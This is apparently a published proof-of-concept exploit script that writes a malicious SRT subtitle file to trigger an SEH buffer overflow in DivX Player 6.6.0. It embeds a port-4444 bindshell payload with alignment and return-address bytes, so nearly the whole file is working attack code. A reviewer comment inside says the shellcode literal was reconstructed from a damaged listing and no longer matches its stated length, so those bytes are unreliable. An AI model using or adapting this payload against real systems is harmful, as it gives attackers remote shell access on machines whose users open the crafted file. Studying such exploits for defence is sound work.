# Title : DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit
# Published : 2008-04-18
# Author : muts
#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#######################################################################
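# Name of the SRT subtitle file that will be written.  It is the subtitle
# file the player parses, not an AVI (the original comment misnamed it).
file = "infidel.srt"

# Unicode-friendly POP POP RET somewhere inside DivX 6.6 (address picked by
# the original authors on XP SP2; after the Unicode widening it presumably
# becomes 0x00480094 -- not re-verified here).
# Note: \x94 bites back (xchg eax,esp) - dealt with by xchg'ing again and
# doing a dance to the shellcode gods.
ret = "\x94\x48"

# Align stack for register save.
nudge = "\x48\x6d"

# Payload building blocks.  In this Unicode stream every instruction byte is
# paired with a \x6d byte that the authors use as their "nop" filler; the
# real instruction stream only makes sense once each byte has been widened.
buffer = "\x41" * 1032          # filler up to the SEH overwrite (per the title)
xchg = "\x94\x6d"               # Swap back EAX, ESP for stack save, nop
pushad = "\x60\x6d"             # Save stack registers, nop
pushfd = "\x9c\x6d"             # Save flags, nop
align_buffer = "\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D"  # Point to end of buffer
align_eax = "\x2D\x2F\x10\x6D\x05\x10\x10\x6D"  # Align EAX for popad/fd
popfd = "\x9D\x6D"              # popfd, nop
popad = "\x61\x6D"              # popad, nop
padding = "\x70" * 14           # Crawl with remaining strength on bleeding knees to shellcode
rest = "\x01" * 5000000         # Buffer and shellcode canvas (5,000,000 bytes)

# PoC Venetian bindshell on port 4444 - ph33r.
# Built on the alternating 00 01 surface; Venetian self-decoding bindshell,
# 1580 bytes according to the authors.
# NOTE(review): the literal below was restored from a listing that had lost
# its backslashes (every "xHH" was read back as "\xHH").  It follows a 5-byte
# "\x80 \xHH \x6D \x40 \x6D" rhythm, but the lines starting "\xC9\x6D\x80\xEF"
# and "\x40\x6D\x80\x1C" break that rhythm and the total comes to 1578 bytes,
# not 1580 -- compare against the original divx66.py.txt before relying on
# the shellcode bytes.
bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
    "\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
    "\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
    "\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
    "\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
    "\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
    "\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
    "\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
    "\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
    "\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
    "\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
    "\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
    "\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
    "\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
    "\x40\x6D\x80\xBF\x6D\x40\x6D"
    "\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
    "\xC9\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
    "\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
    "\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
    "\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
    "\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
    "\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
    "\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
    "\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
    "\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
    "\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
    "\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
    "\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
    "\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
    "\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
    "\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
    "\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
    "\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
    "\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
    "\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
    "\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
    "\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
    "\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
    "\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
    "\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
    "\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
    "\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
    "\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
    "\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
    "\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
    "\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
    "\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
    "\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
    "\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
    "\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
    "\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
    "\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
    "\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
    "\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
    "\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
    "\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
    "\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
    "\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
    "\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
    "\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
    "\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
    "\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
    "\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
    "\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
    "\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
    "\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
    "\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
    "\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
    "\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
    "\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
    "\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
    "\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
    "\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
    "\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
    "\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
    "\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
    "\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
    "\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
    "\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
    "\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
    "\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
    "\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
    "\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
    "\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
    "\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
    "\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
    "\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
    "\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
    "\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
    "\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
    "\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
    "\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
    "\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
    "\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
    "\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
    "\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
    "\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
    "\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
    "\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
    "\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
    "\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg + popfd + popad + padding + rest)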
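# Write the SRT: a single subtitle entry whose text line is the payload.
# Text mode is kept as the authors ran it (Python 2 on XP): the payload
# appears to contain no 0x0A byte, so newline translation only touches the
# two header lines.  Under Python 3 the str payload would be UTF-8 encoded on
# write and every byte >= 0x80 would be mangled -- use 'wb' and bytes there.
f = open(file, 'w')
try:
    f.write("1 \n")
    f.write("00:00:01,001 --> 00:00:02,001\n")
    f.write(bindshell)
finally:
    f.close()
print("DivX 6.6 SEH SRT Overflow - PoC\n")
print("http://www.offensive-security.com/0day/divx66.py.txt\n")
print("SRT has been created - ph33r \n")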